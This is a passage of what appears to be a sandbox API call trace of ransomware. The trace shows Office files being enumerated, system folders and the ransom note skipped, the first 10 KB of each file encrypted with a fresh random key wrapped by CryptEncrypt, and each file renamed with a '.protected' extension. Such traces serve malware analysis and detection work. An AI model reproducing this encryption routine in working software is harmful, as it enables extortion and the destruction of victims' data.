lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.950] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.950] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.950] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.950] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.950] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.950] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.950] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.978] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.978] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.987] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.987] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.000] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.000] 
CloseHandle (hObject=0xd8) returned 1 [0068.001] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.protected") returned 83 [0068.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.protected")) returned 1 [0068.001] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Windows") returned -1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.001] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.001] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.001] lstrcmpW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.001] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.001] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.001] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.002] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.002] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.002] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.002] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.018] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.018] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.019] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.019] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.019] WriteFile (in: 
hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.019] CloseHandle (hObject=0xd8) returned 1 [0068.020] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.protected") returned 81 [0068.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.protected")) returned 1 [0068.020] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.020] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.020] StrStrIW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.020] lstrcmpW (lpString1="PPINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.020] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.021] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.021] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.021] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.021] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.021] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.021] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.021] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.029] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.029] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.030] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.030] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.034] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.034] CloseHandle (hObject=0xd8) returned 1 [0068.043] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.protected") returned 80 [0068.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.protected")) returned 1 [0068.043] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Windows") returned -1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0068.043] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.043] StrStrIW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.043] lstrcmpW 
(lpString1="PPINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.044] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.044] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.044] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.044] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.044] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.044] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.055] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.055] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) 
returned 1 [0068.056] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.056] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.057] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.058] CloseHandle (hObject=0xd8) returned 1 [0068.058] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.protected") returned 81 [0068.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.protected")) returned 1 [0068.059] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.059] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.059] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.059] lstrcmpW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.059] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.059] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.059] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.059] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.059] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.060] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.060] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.060] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.060] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.060] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.061] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0068.061] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.061] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.062] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.065] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.065] CloseHandle (hObject=0xd8) returned 1 [0068.065] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.protected") returned 82 [0068.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.protected")) returned 1 [0068.066] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Windows") returned -1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files") returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", 
lpString2="$Recycle.bin") returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0068.066] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.066] lstrcmpW (lpString1="PUB6INTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.066] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.066] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.066] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.066] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.066] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.066] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.067] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 
lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.073] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.073] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.074] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.074] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.078] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.078] CloseHandle (hObject=0xd8) returned 1 [0068.079] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.protected") returned 83 [0068.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.protected")) returned 1 [0068.079] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Windows") returned -1 [0068.079] 
